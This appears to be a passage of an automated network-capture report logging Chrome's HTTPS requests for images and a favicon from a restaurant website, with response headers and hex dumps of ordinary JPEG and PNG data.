                                                                                                                                                    2024-10-01 04:26:33 UTC3654INData Raw: f7 4e 1f 95 3c bd a8 f0 4e 34 f0 60 a4 49 d3 45 6c 4b c6 1a 85 44 23 1d 66 44 7f 15 8b 10 0d 6c 47 f2 ff 00 0b 1e 29 16 19 65 cc 77 60 86 0c 72 22 32 3c a7 72 a3 09 1b 8c 53 81 53 a0 43 2e 4d cd 78 a8 99 47 94 e9 e8 a5 3b 5c 80 e1 63 c9 3a 39 a0 4f 32 00 01 4a 70 0c 36 64 df 50 ff 00 25 d2 35 24 6b c1 46 e1 75 a5 ee 42 13 f6 1f 68 e0 81 88 00 ab 4f 15 4e 08 16 79 48 7f 15 39 01 75 80 b4 46 8a 40 45 b8 93 b2 91 9c de 41 99 8a 11 84 d9 8b d1 1e da 32 79 1f 71 46 f3 ae fe aa 38 f2 66 e9 4b 26 51 01 f9 63 bc e4 b2 e1 c7 94 e6 8e 33 cb 91 ad 71 f7 32 18 66 cc 68 26 38 ab 15 3d 50 07 63 45 6e 38 b6 68 8b a3 3d 1d be 95 3e a8 6c 8e c5 f6 21 46 4e d9 21 ac b6 6f 35 03 8f 2b b7 b6 42 8a 23 38 ba 4d 49 8f 72 8e 2c 9d c4 b3 62 89 68 c0 9a 88 f0 0a c7 71 e6 8b 85 fe
                                                                                                                                                    Data Ascii: N<N4`IElKD#fDlG)ew`r"2<rSSC.MxG;\c:9O2Jp6dP%5$kFuBhONyH9uF@EA2yqF8fK&Qc3q2fh&8=PcEn8h=>l!FN!o5+B#8MIr,bhq


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    49192.168.2.449798162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:33 UTC386OUTGET /assets/imgs/special-menu-2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:34 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:33 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 80908
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:33 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:34 UTC16031INData Raw: ff d8 ff e1 26 51 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 37 3a 32 34 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: &QExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:17:24
                                                                                                                                                    2024-10-01 04:26:34 UTC5499INData Raw: fe 05 ef 6b 37 7e f7 ef ad b7 1d ae 0e 6e 88 cb 1c 26 35 1f 50 be 19 67 0d 8e 9d 8b e6 18 97 55 6d 21 ed 70 74 c4 6b 32 3c 5b f9 ab 50 58 3d 23 a6 a4 49 1d be e5 81 f5 9f 11 bd 0f eb 5d f8 f8 cd f4 b0 f2 83 32 a9 a9 a6 1a d1 6c fa ad 60 1f 41 ad c9 ae fd 8c fc c5 78 64 ce 39 b2 46 d6 88 8f 3e 15 63 8e a7 c2 7c 9b 22 77 1e 2e de a7 ff d3 eb 7e b4 f5 5b fa 7f 48 be dc 3b a9 a7 35 c3 6e 1f ac 37 07 3f e9 39 95 56 3e 95 de 96 e7 57 bd af a7 d4 fe 79 79 76 5f d6 1e bd 92 c3 66 6e 63 b3 2a a4 cb 5e e6 03 0f 78 f6 6c f4 9a ca db fa 4d 9e cf a7 ec ff 00 85 5d 57 d7 cc c3 66 7d 58 6c b1 c1 d8 f4 3d f1 5d 7b 9e d7 dc 3f 48 e1 bc 6d b1 bf 65 67 fc 1b 2a b6 df e7 2c b3 d9 57 9e e7 52 fc 67 fa 0e a5 cd 6d 2c 65 80 13 cc fb b7 b8 ed 0d f7 55 bd be 95 7f 43 fd 2d 9e f5
                                                                                                                                                    Data Ascii: k7~n&5PgUm!ptk2<[PX=#I]2l`Axd9F>c|"w.~[H;5n7?9V>Wyyv_fnc*^xlM]Wf}Xl=]{?Hmeg*,WRgm,eUC-
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 00 50 00 68 00 6f 00 74 00 6f 00 73 00 68 00 6f 00 70 00 20 00 43 00 43 00 20 00 32 00 30 00 31 00 35 00 00 00 01 00 38 42 49 4d 04 06 00 00 00 00 00 07 00 01 01 01 00 01 01 00 ff e1 0d ab 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e
                                                                                                                                                    Data Ascii: Photoshop CC 20158BIMhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 9a cd e1 25 37 0c ac 73 ed 3d ba 89 cf 33 db a2 93 cf 35 99 1a 95 aa 95 b4 2d 9a 3a 7b cb 72 53 3f 49 ac 5a c1 76 c2 ac b5 e6 9d aa f3 6c b5 4f e0 44 af 6a 25 84 d5 bf 61 2b 81 78 b7 45 64 fe 65 35 85 ad 45 5b 99 5e 71 61 96 b7 d9 bb 4b 6e f7 33 aa aa 6c 74 3a 12 3d ae 67 f2 d3 e4 35 da 1e 7a c4 fd 4b d5 eb 75 1e b1 02 fe 9e d4 62 24 b7 db f1 b9 76 bb d3 43 ff 00 25 6f f3 6d c9 4b e1 96 7f e6 47 c6 b6 b0 4d 12 1b 52 f3 60 a5 24 2d 1b 57 b3 cf ab cf 78 eb 7d 7a bd bb 10 75 24 16 ac 2a f4 1f 87 6b a2 93 71 ed 54 ab d9 e7 da 8e c4 3e a7 1b 37 96 ea 57 bb 56 ed 29 79 d7 eb c8 76 73 ee b2 c2 d7 dd 98 43 66 dd 51 2d 88 ed 07 af 21 47 7b 13 2d fb 86 e1 b1 17 3a 48 e8 cf 14 09 22 89 bc 7f e8 f4 2c 88 7a 32 4f 1d 81 1d c8 0a 98 ec d7 10 2c 56 85 c7 6a 55 64 73 cb
                                                                                                                                                    Data Ascii: %7s=35-:{rS?IZvlODj%a+xEde5E[^qaKn3lt:=g5zKub$vC%omKGMR`$-Wx}zu$*kqT>7WV)yvsCfQ-!G{-:H",z2O,VjUds
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: e9 21 eb 28 6c 07 61 92 fc 64 0f f7 4f 1f 2d 47 04 b9 6d 76 81 ba 9d 25 25 d1 49 16 2f 02 b9 fb ca 97 a3 b8 fc da ed 40 77 89 d2 c7 03 af 20 bf 8d 72 f8 89 4e ee d8 0f 14 65 0e 25 19 c0 5b 0f 66 8c cb 3f 43 7b b5 2d 7b df 16 0a 3c 3e d2 48 b5 20 90 45 12 27 35 d5 09 6c 4e be 63 8f 2d 74 b6 b7 8d 7f 88 6c 1f 51 e2 6b 0e 4a 8d a5 90 ce f0 06 c2 67 1d 47 0c e3 16 6b bf 2f 65 12 ec f2 4b 22 de 1e b5 f1 52 75 e8 a2 f9 56 5f 17 c3 a1 d5 57 88 0d 19 08 be 24 f9 0a fe ca c6 19 6f 2a d8 32 91 6d 4f ab 5a 8a d3 5a d7 f5 08 36 20 8b 10 75 04 7b 42 9a 5d aa 9f 97 6e 8e b9 c0 07 4c 9f c5 db 9e 4f f9 78 53 3c fb 71 bb db 0f fd 4e dc 17 00 77 cb 1f da c5 4a c0 8b 70 b0 ef a2 45 bf a6 8c 83 f6 5f 4a 0c d6 d7 80 07 5b 55 ae 38 6a 4f 1a d7 51 de 2b 85 77 81 d8 68 b1 b6 9a
                                                                                                                                                    Data Ascii: !(ladO-Gmv%%I/@w rNe%[f?C{-{<>H E'5lNc-tlQkJgGk/eK"RuV_W$o*2mOZZ6 u{B]nLOxS<qNwJpE_J[U8jOQ+wh
                                                                                                                                                    2024-10-01 04:26:34 UTC10226INData Raw: b7 52 29 01 58 ba a3 39 2a 54 69 e6 bd fc ad 96 4b 5b 9d 82 4e 1e 5d b4 4c d0 62 f9 47 31 8c 65 2f 4a 53 ec d4 7b cd ab e2 ac c5 37 30 eb 72 05 9e 29 58 1f bb 6f b3 fa 95 0c f3 6e e3 93 75 2a ac e6 08 8e 58 c6 df 12 35 92 45 e4 ea 7a f1 7d dd 24 7b 6b 6d 94 82 19 63 01 2e 1b c6 bc be 5a bf 4b 38 89 c7 3f 4d 03 b5 2d 24 67 d7 01 48 3d bd b8 d0 6d fc 65 b1 46 68 a3 61 92 3b db e1 23 fe 17 f1 2a 5f cf 6f 97 64 c5 4b 23 c9 1b 3a 3c 97 f0 c8 d1 7d 8a 7e 25 66 97 fc bc 6c a0 b9 04 a2 96 38 ea f6 e5 a8 e4 81 e3 dc 47 aa f5 10 95 e6 b6 56 e9 c9 8c 94 1f 70 a6 24 5e 22 f6 bf b5 7a dc 00 2e 66 20 0b f1 e5 b2 af d6 e5 a8 22 f9 6a fc 24 89 53 70 26 b1 91 a6 1f 16 57 55 fb be 7e 44 c2 bf 29 14 a6 57 9b 59 20 b0 20 11 e1 c6 c3 2e 4a 70 78 8b 0c 46 a4 db ba d5 cf 1f 52
                                                                                                                                                    Data Ascii: R)X9*TiK[N]LbG1e/JS{70r)Xonu*X5Ez}${kmc.ZK8?M-$gH=meFha;#*_odK#:<}~%fl8GVp$^"z.f "j$Sp&WU~D)WY .JpxFR


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    50192.168.2.449799162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:33 UTC378OUTGET /assets/imgs/back_2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:34 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:33 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 147378
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:33 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:34 UTC16031INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 01 c8 08 02 00 00 00 20 1b 60 aa 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 31 34 20 37 39 2e 31 35 36 37 39 37 2c 20 32 30 31 34 2f 30 38 2f 32 30 2d 30 39 3a 35 33 3a 30 32 20 20
                                                                                                                                                    Data Ascii: PNGIHDR `tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02
                                                                                                                                                    2024-10-01 04:26:34 UTC5499INData Raw: 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 ff ac 87 2e c1 b7 2e 35 f5 49 70 c8 da 84 77 98 6c a1 94 7c 03 ec e4 02 f5 3f a4 98 c5 10 28 9a 0a 64 68 52 20 fe 48 90 50 00 67 b7 17 05 78 ce c1 86 b2 53 67 55 c9 dd 5a e9 41 8c 73 94 12 d6 ad ae 2a 9a 4e df 4f 71 a3 b0 55 90 0a 82 e5 44 35 5e 4f e8 24 b6 4a ed 5d 98 e7 88 3f a7 ed 32 11 eb 99 26 89 37 59 72 a1 19 df 89 fc 56 1a f3 5e 52 b0 9a ee 1f 7c 0c 58 0f 62 53 7c 6a 4a cd 84 24 c4 1b b7 f2 61 d9 f8 f1 ec 6f f2 84 2b b1 f8 70 57 06 6e 76 7a 9c e2 7e 08 77 77 76 bb ad db 9f 69 2b d8 98 43 1f 9d f3 8f 4e ef 00 58 12 da e8 b6 12 b5 7a de 9c f8 37 d5 d4 fe 2e 8f cd 4a 1f 0e 21 7a f2 2d 12 f1 c5 58 b9 0c 7b 04 21 cd f0 8f e2 fb 3e ac 1b 58 e5 01 eb 69 2c 92 36 78 5c e8 87 54 3d 35 97 d1 4a cc 39 37 c4 30 30 e1
                                                                                                                                                    Data Ascii: gp&gp&..5Ipwl|?(dhR HPgxSgUZAs*NOqUD5^O$J]?2&7YrV^R|XbS|jJ$ao+pWnvz~wwvi+CNXz7.J!z-X{!>Xi,6x\T=5J9700
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 90 7f 7d 5e 2d d6 b6 30 68 d6 59 2e 14 0f c0 3a 2b dd 12 dd c5 8a 02 ae 29 f0 86 7e 15 ab 06 93 b6 46 a5 d1 0f ce f6 97 96 94 e0 88 e1 bc 74 06 35 d7 ab 63 87 29 0d 33 f2 d4 5d b2 19 35 4b e3 3c ea 61 f7 bd 55 df 76 73 96 17 7d 96 7c 31 7c 7e 9d 88 c8 57 d1 96 37 f1 58 cf 8a 6b d3 cc 57 ad 2d df d9 b0 20 8a 56 f7 9c ce 13 5a 0c 8c d3 6f 35 4c e2 96 a7 1a 37 d3 8c 07 a8 4b d7 4e 29 c5 e4 c2 a6 67 8c 5f 51 7e 75 c7 3a 80 61 8c b0 00 69 53 a4 76 de 1d cf 8a 56 29 bf 47 b0 6a e1 bd 2d 85 f7 09 f1 ad b5 f7 73 ca 91 67 03 3f 65 5e 45 e5 17 06 d0 c4 4a 1c cc 5b 95 9a f9 28 4a 0d 3f c7 c1 ef 4a 47 4f 04 2e 55 49 f2 38 c7 28 3d df 19 65 04 ee 5f 48 5f 6f df c8 ac 57 72 72 c9 47 66 bf b3 77 a4 d5 ec c4 d8 b0 c4 6d af c0 ec 52 f2 fb 8d 44 2d f6 6b bb cf fc 36 c6 de
                                                                                                                                                    Data Ascii: }^-0hY.:+)~Ft5c)3]5K<aUvs}|1|~W7XkW- VZo5L7KN)g_Q~u:aiSvV)Gj-sg?e^EJ[(J?JGO.UI8(=e_H_oWrrGfwmRD-k6
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: b8 53 d2 16 4a 78 a9 9f ff e2 c3 ef 3e 7c d2 6a a3 24 98 ee 14 23 e7 b2 05 7f a0 53 38 8c b3 17 02 29 ac 8f f5 33 db 97 6a f6 69 89 ce 45 63 84 2a 85 ea e7 21 3e 6c 57 aa da 86 cf 33 fa b7 88 8e 47 d9 c8 97 84 46 b1 46 e0 e0 95 10 c6 d8 6e 0d 76 9d 8c cc b3 f8 f4 14 90 f2 cb d8 32 cb 29 bf b3 ff 00 66 cb 21 0e ac 10 8f 3e f8 c1 eb 5e bf ea e5 79 c9 6c e4 98 84 16 f0 b5 36 d2 2d e9 30 e4 6d cf c5 37 6b cb 97 60 b5 84 8b e2 45 94 0c 0e b3 0f db 46 94 7c 46 e6 12 40 61 8f 43 88 e1 d5 b0 5a 2b 76 45 71 3c 17 91 75 08 8e 71 42 31 17 56 f4 6e 36 2d 78 01 8c 9a 67 cf 21 74 1a a3 3c ae 49 b9 31 62 76 30 98 f8 f9 4e d5 7d 03 b5 eb a4 0f ab 66 fd d3 01 15 5c 60 82 e3 92 a6 25 7d de ab 35 68 8b 7a 4b 5e 37 77 a0 3a 7b f0 ec 38 7a 1f 01 4a 75 b7 93 35 db 72 5a d8 38
                                                                                                                                                    Data Ascii: SJx>|j$#S8)3jiEc*!>lW3GFFnv2)f!>^yl6-0m7k`EF|F@aCZ+vEq<uqB1Vn6-xg!t<I1bv0N}f\`%}5hzK^7w:{8zJu5rZ8
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 9f bc ff 09 55 6d 44 39 25 32 87 5a f6 71 80 33 96 65 94 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 f0 f7 21 dc 2c 8f a2 43 91 37 29 88 da 86 12 4e 39 47 cc 7e b8 9c 57 58 e2 7f 41 36 67 39 50 b6 03 bb 27 aa 32 11 8b d8 cb 32 8b 91 1e f6 97 72 2d ea 26 a9 e9 8c 85 fd d8 90 51 c5 5c 12 b9 f7 30 99 6d ff c6 b8 9f cf 28 f2 8d 9a 29 5a 3e 1d 23 70 00 43 f8 f5 39 c2 e5 77 6b 0d 21 f4 ef 7d 3c 4c 19 3e 0f 35 ad 31 e5 9f 3a b5 5b e9 5f 0f 11 48 ea 3b ac 3f 9f 5c ae 12 2c 70 ae 51 55 0f 1d 13 39 54 54 2f 5e f1 4c 3e a0 6d 0e a2 62 87 11 77 49 e9 4c fe b2 09 42 a0 b8 38 0c 6c dd 61 da 04 af 16 ca 1c f2 66 83 3c ed e9 31 ff 72 ca 2c 3f de 37 df a5 0a 28 fd f9 be 39 4c e0 51 37 87 b4 ed 95 d5 72 d9 4f f1 92 9b a8
                                                                                                                                                    Data Ascii: UmD9%2Zq3egp&gp&gp&gp&g!,C7)N9G~WXA6g9P'22r-&Q\0m()Z>#pC9wk!}<L>51:[_H;?\,pQU9TT/^L>mbwILB8laf<1r,?7(9LQ7rO
                                                                                                                                                    2024-10-01 04:26:34 UTC16331INData Raw: 59 94 e9 69 34 6e dc d0 55 0a 7e a9 dd 2c 62 ef f9 e9 78 88 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 ff 93 09 57 17 4c b1 93 a1 96 47 d2 80 02 e0 08 2f ef f3 80 7c cf b7 8e d9 c6 ac 3b fe ea ac af 56 f2 1f f7 f1 7e 58 34 5d ae 5a 61 35 3e 0e 7f 06 d3 25 4f 03 76 ea d4 9b f6 4f 5a 4b 9f 8b f6 36 90 e4 e6 c0 b0 74 84 2d 2f 57 96 5b 55 b8 af a7 44 c4 2d 33 9e 15 bb 0d 09 17 99 33 be d5 aa 79 84 e9 cd 83 d7 d2 10 98 5d 7c 54 92 a5 d3 ac b9 31 28 11 c3 d9 2f ea a9 1f 67 98 d7 dc af b0 15 26 17 7c f6 29 f8 84 f5 0d c6 95 44 ed 19 e7 e3 f1 18 d6 1b 9d 73 42 35 71 c1 45 7e 4c 35 c8 a2 10 c3 31 94 7d 16 60 1d 09 5e ee 0d f3 b3 72 b3 57 f6 14 43 80 a6 11 46 19 40 2a 4e 91 2d da 40 5c 3c 35 04 5c 73 86 5c 19 d3
                                                                                                                                                    Data Ascii: Yi4nU~,bxp"'p"'p"'p"'p"WLG/|;V~X4]Za5>%OvOZK6t-/W[UD-33y]|T1(/g&|)DsB5qE~L51}`^rWCF@*N-@\<5\s\
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: d2 17 82 df 1d 31 81 70 53 e9 95 92 70 8d d4 a2 12 02 fe 06 eb 77 53 50 80 82 16 67 d1 71 8e 15 ec 1c c6 84 35 a2 9a 78 56 3d 07 e7 75 53 f2 51 36 d5 2b 6b a8 91 2a d9 0d 1e 6e 2d a5 08 21 81 d7 5b 95 73 09 e9 5c 6a 9e ff 8b 3a 27 dc 86 08 d4 a1 08 f7 72 d0 01 e2 59 57 ea 3c b8 75 cc b9 70 7d 63 6a a3 60 1a ce 61 82 a5 c4 86 c6 53 0d 7c 74 a8 d7 de db d4 c0 4a 9e 56 b9 e3 29 80 5a d6 18 0f 28 91 0e 17 e4 36 9f 1c 02 2f 57 e3 3f 77 c2 dd 31 8a 14 be 5c 6b 9c 61 48 e7 c0 9e f5 cb d3 af dc 1d d0 6a 82 bf 3a 02 bf c8 c0 70 b1 28 8f cf f9 8d cc 71 56 83 31 46 66 99 9b 02 56 4c 02 b6 8c e7 43 81 df c7 89 9d fa b0 6e d0 87 60 96 3f dd 68 58 05 f8 02 de 39 5f f6 d0 a7 d3 69 0a 21 56 4a 82 5b 3c 50 ca 59 bb c2 25 bb 29 ae d7 b8 ab 1c 4f 4e 0a b9 aa c5 4f 2d 16 a6
                                                                                                                                                    Data Ascii: 1pSpwSPgq5xV=uSQ6+k*n-![s\j:'rYW<up}cj`aS|tJV)Z(6/W?w1\kaHj:p(qV1FfVLCn`?hX9_i!VJ[<PY%)ONO-
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 ef 42 38 56 40 b7 2e 96 3f ef e4 d3 9c a5 e2 9d e2 af 73 1a ab e8 cc e7 2f 34 a2 63 cb 8a f5 f1 12 3d c1 3b 23 b6 e7 d9 ad 03 26 fb 58 e6 fc ed f6 df a9 e7 be 32 e7 63 39 af 39 e0 10 e5 7e a7 fe 50 fe e7 97 67 0f b7 7a 78 b0 fc 63 32 78 25 a0 7d 6c 59 8e e3 31 e4 54 ee 1f cc cb b3 87 b1 3d 3c da 72 2b 63 72 49 04 b5 9c 06 9c f5 fa 84 a9 12 21 d8 74 0a 6d f3 82 ed 14 e0 15 7c b2 5a 59 2d 5b 9e a4 16 a4 33 1f a2 af 79 0c c3 79 4b 65 5c 47 78 ce 79 4a 59 29 d1 8f 0a b0 73 4b 84 55 60 b7 b3 a3 f9 4e d8 af 81 2d 0b 50 bb e5 4f ac e2 7d 27 8c e4 57 b6 ae 7a 2b fc 4b 81 f4 8d aa 7b f6 95 4d 06 fc 12 48 3f 94 06 a9 d5 f8 bf 3d 87 22 e4 3f ee 14 fb 53 af da 8d d4 1b ad 20 74 e7 19 bb 7c e2 12
                                                                                                                                                    Data Ascii: D8ND8ND8NB8V@.?s/4c=;#&X2c99~Pgzxc2x%}lY1T=<r+crI!tm|ZY-[3yyKe\GxyJY)sKU`N-PO}'Wz+K{MH?="?S t|
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 35 6b 4a 24 d7 c4 03 e6 46 72 4b 6e 14 94 91 81 a9 64 6d c1 d7 e8 8f 6b 61 77 64 dc a7 bc c4 e4 0a 8f 52 ae 31 2d 0e 42 2a 5f 72 19 28 b8 8d ff 45 2d 1b c0 55 08 84 5d c2 c1 d8 8d b3 14 94 bf 91 40 0f d3 46 18 2c f5 07 74 c0 d0 15 b9 2a 3a be ba 00 0e ee b0 55 e4 46 de bc 04 f8 04 d8 97 da d0 33 14 31 76 b5 0d 65 bd 23 58 00 8e 5c 63 11 e8 9e 7a e3 c4 92 cb 2e a5 73 c2 7d 0a 87 41 b5 79 8a 7a 05 60 58 6b ac ca 87 59 57 75 18 9c 6c ce 59 d6 ec 4f 2b ef 87 8f 10 4e 6b 60 70 bb 5d 27 e1 f4 d3 14 71 07 40 29 a7 a5 40 34 66 2e f6 a3 d9 ef 24 10 03 11 1b 32 5b 02 3b 9d 02 26 57 58 de 75 e2 d0 c3 4f 38 9f a6 97 93 13 f0 14 5a cc c1 80 c1 ab e0 29 f8 03 e6 07 9c c1 bd 60 fe 3e 63 22 68 db f1 21 b6 8d 18 d5 36 4c f2 2f 88 bc 30 a1 dc e2 4b 81 f8 be 11 db 11 a8 52
                                                                                                                                                    Data Ascii: 5kJ$FrKndmkawdR1-B*_r(E-U]@F,t*:UF31ve#X\cz.s}Ayz`XkYWulYO+Nk`p]'q@)@4f.$2[;&WXuO8Z)`>c"h!6L/0KR
                                                                                                                                                    2024-10-01 04:26:34 UTC11213INData Raw: ee f4 cd c6 fc f1 e0 ef 4f 71 4d ea 2d 70 4d 00 08 45 be bd 2a 69 8d 7d 1f 2b 8b a3 c0 ee 96 2b 0d 90 8d 13 72 f3 d8 27 01 2f 94 d4 91 70 cd 82 85 29 19 9b 82 d5 9b d9 25 09 54 3d 0c 79 55 61 52 48 52 39 3d 19 5d 34 3a 3f 8e c9 fc 77 e6 09 8e fb 47 2f 31 77 64 21 08 27 0f ab 49 2e 4d 53 a9 6e 3f e7 7c b5 ae bd 9e 9e 7b 3d f7 f2 ec fd f5 32 f4 b4 06 2d a9 91 a2 06 a4 08 9a 54 e0 93 4f b9 94 85 f0 c2 92 24 6b 9f 26 71 3a 05 b5 31 24 b3 83 09 9e bb b5 8a a2 1e bd 18 c7 f4 65 f0 45 fa bc 36 f0 c2 05 14 f7 88 30 e1 4c 38 13 ce 84 33 e1 4c 38 13 ce 84 33 e1 4c 38 13 ce 84 33 e1 4c 38 13 ce 84 33 e1 4c 38 13 fe 1e 84 9b cf e7 68 50 57 1b 6d ad 67 61 97 39 5b a1 c4 53 03 cc ef 44 c7 ab d7 a6 0c 89 0b c9 79 51 ca f6 4d 55 dd ad e5 8f b7 7c 5c 68 c4 82 76 98 e4 76
                                                                                                                                                    Data Ascii: OqM-pME*i}++r'/p)%T=yUaRHR9=]4:?wG/1wd!'I.MSn?|{=2-TO$k&q:1$eE60L83L83L83L83L8hPWmga9[SDyQMU|\hvv


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    51192.168.2.449802162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:33 UTC620OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
